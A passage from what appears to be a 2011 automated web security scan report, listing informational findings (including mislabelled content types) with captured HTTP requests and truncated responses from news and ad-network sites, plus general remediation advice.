Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

24.18. http://share.meebo.com/cim/whitev4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://share.meebo.com
Path:   /cim/whitev4.html

Request

GET /cim/whitev4.html HTTP/1.1
Host: share.meebo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie=7c2126d393b99323557e; tcookie=299d841e219be7e7276c%26true%26ic22%3D1%26ic19%3D1%26ic17%3D1%26ic16%3D1%26ic12%3D1%26ac17%3D1%26ac16%3D1%26ac14%3D1%26ac12%3D1%26ac10%3D1%26pc1%3D1%26pc4%3D1%26ic9%3D1%26ac5%3D1%26ic3%3D1%26ic1%3D1%26ac8%3D1%26ic5%3D1%26AG%3D1%26AK%3D1%26AM%3D1%26AQ%3D1%26ac18%3D1%26ac2%3D1%26ic23%3D1%26pc5%3D1%26ic13%3D1

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Mon, 07 Feb 2011 19:27:40 GMT
ETag: "2047208199"
Accept-Ranges: bytes
Server: lighttpd/1.4.19
Content-Type: text/html
Cache-Control: max-age=135308
Expires: Wed, 11 May 2011 05:10:38 GMT
Date: Mon, 09 May 2011 15:35:30 GMT
Connection: close
Content-Length: 350

<html><body style="margin:0;padding:0;"><script>
var url = decodeURIComponent(window.location.hash.slice(1));
if(url && /^http/.test(url)){
   if(window.self != window.top) {
       document.write('<ifra
...[SNIP]...

24.19. http://uac.advertising.com/wrapper/aceUACping.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://uac.advertising.com
Path:   /wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; GUID=MTMwNDk1NTQyMzsxOjE2cjRvcHExdHZsa21sOjM2NQ; C2=kpAyN5pqDIxFGekovMg3sYI7SKMCItdBwhQ3WXAcIsY4FAHC7opBwhA8NYAcI0eDGAHC6ijBwhgihXAcIsZ4FAHCv3gBwhQ3gZAcIMa4FAHCEGeBwhAmoZAcIwtlGAHCqGeBwhAxBaAcIca4FAHCA9qBwhAuBaAcIYnXGAHCWGoBwhg/VYAcIsN5FAHCr4oBwhwtZaAcIE0rGAHCNLqBwhgQvaAcIogmGAXtqOgGzaI71uKBhMrRYEZAEAazFEkZmjoxnG7IEwGlGjRj0jw+NXAcLiLBFAbhJV2KoaQUw6JBvHpxXVJ9EsuoGm0kQRANZX8Vs6OBBMnxXRrcEsNrGfVqHQwzeZ8VgCGBvCiBdPb1FQiqGuyovXw10Y4YRCsB7GdBM5a+GQ4kGm3sQZwSkaIho6vBh6lxK+5wGACHGJbt/fQl0aAEllOtGgUoWcQ3jYgRhy7BnrixHhpDHwyIGVyBcOqRlcQ82XUJpa0B1/lxTXIumN4CGASskgwbUaIRzaHCwTqxvN7NI0+oGAH; F1=BQmCI3kAAAAAYm1CAEAA8DABAAAABAAAAMAA8DA; BASE=Rgwq+yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2uvWu4QL44U5Tp5J7h57WACK9DFolo7ZgEc+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp15Ixv1d4QM!; ROLL=boAnr2C+ORAgA1G9JNnz8yH!

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2
Accept-Ranges: bytes
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 16:30:27 GMT
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:39:14 GMT
Connection: close
Content-Length: 2793

<html><head></head><body><script type='text/javascript'>    
// pingArray['cookieValue'] = ['extra_tag_property_name', 'matching pixel called']
var pingArray = new Array();
pingArray['rm'] = ['rmcpmprice
...[SNIP]...

24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:15 GMT
Server: Apache
X-Host: w4
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:38:15 GMT
Content-Type: text/html
Content-Length: 59938

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_0.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.en
...[SNIP]...

24.21. http://www.fox8live.com/images/phone.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /images/phone.png

Request

GET /images/phone.png HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:06 GMT
Age: 38
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /sites/scripps/images/rounding/tab-bg.gif

Request

GET /sites/scripps/images/rounding/tab-bg.gif HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:09 GMT
Server: PWS/1.7.2.1
X-Px: ht brf iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:37:27 GMT
Age: 102
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /sites/wvue/images/promos/fox8insider.jpg

Request

GET /sites/wvue/images/promos/fox8insider.jpg HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:59 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
ETag: "0e287457fe9c71:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:28 GMT
Age: 31
Content-Type: text/html
Vary: Accept-Encoding
Px-Uncompress-Origin: 1454
Last-Modified: Tue, 28 Aug 2007 14:25:24 GMT
Connection: keep-alive
Content-Length: 1454

<html>
<head>
<title>Oops! Page Not Found.</title>
<script type="text/javascript" language="javascript">
<!--
function RedirectToASP()
{
   var url = document.location.href;
   var pathStart = url
...[SNIP]...

24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_flat_75_ffffff_40x100.png

Request

GET /assets/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_glass_65_ffffff_1x400.png

Request

GET /assets/images/ui-bg_glass_65_ffffff_1x400.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.therepublic.com
Path:   /assets/images/ui-bg_glass_75_e6e6e6_1x400.png

Request

GET /assets/images/ui-bg_glass_75_e6e6e6_1x400.png HTTP/1.1
Host: www.therepublic.com
Proxy-Connection: keep-alive
Referer: http://www.therepublic.com/home/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=091f1945bf1276a9:T=1304954797:S=ALNI_MaYgzrxiz6jweMA989XDyouR2mntw; _chartbeat2=7enfaz2ubdno12gi; FreakAuth=423b87089976e0474ec7fcf078c4204a

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:37:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 539

<html>
<head>
<title>404 Page Not Found</title>
<style type="text/css">

body {
background-color:    #fff;
margin:                40px;
font-family:        Lucida Grande, Verdana, Sans-serif;
font-size:            12px;
color:                
...[SNIP]...

24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usatoday.com
Path:   /_common/_includes/_community/taboola-async.ssi

Request

GET /_common/_includes/_community/taboola-async.ssi HTTP/1.1
Host: www.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowserSniffer=navigator.type%3D4%3B%0Anavigator.version%3D534.24%3B%0Anavigator.os%3D%22undefined%22%3B%0Anavigator.jsVersion%3D1.6%3B%0Anavigator.vbScriptEnabled%3Dfalse%3B%0A; s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=
If-None-Match: "f27432dd5cffcb1:0"
If-Modified-Since: Wed, 20 Apr 2011 13:14:22 GMT

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 20 Apr 2011 13:14:22 GMT
ETag: "f27432dd5cffcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Mon, 09 May 2011 15:38:28 GMT
Content-Length: 3145

<style type="text/css">
.vidiscovery-note {
   display: none;
}
.more a{
   font-weight: normal;
   color: #00529B;
   float: right;
   font-size: 11px;
}
/*
.taboola h2 {
   background-color: #f0f0f0
...[SNIP]...

25. Content type incorrectly stated  previous  next
There are 31 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:58 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Thu, 12-May-2011 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-38-58_13277019711304955538; expires=Sat, 07-May-2016 15:38:58 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_13277019711304955538; expires=Mon, 09-May-2011 15:53:58 GMT; path=/; domain=c3metrics.com
Content-Length: 6659
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

25.2. http://480-adver-view.c3metrics.com/v.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-09-2011-15-29-49_10650526691304954989; 480-nUID=adver_10650526691304954989

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:53 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

25.3. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=51&b=50020&cid=633862074462683028 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Mon, 09 May 2011 21:38:16 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 09 May 2011 15:38:16 GMT
Content-Length: 6352

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

25.4. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=51&b=50020&cid=633862074462683028&isif=f&rurld=www.csmonitor.com&sl=true&dvp=http%3A//www.csmonitor.com/Business&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=c3e2564e-78bb-4fe5-b016-9ebe8e804603; tpd=e20=1305834684215&e90=1303847484419&e50=1305834684416&e100=1303847484462; Li=1=734247&30=734245; Aqprep_Banner728X90=152290=634388251382156836:51780&160825=634389890253630409:51825&150572=634389917073398373:51825; sgm=8239=734250&8144=734251&9621=734251&9234=734252&9622=734254&7901=734255&7472=734256&10677=734260&10654=734265

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
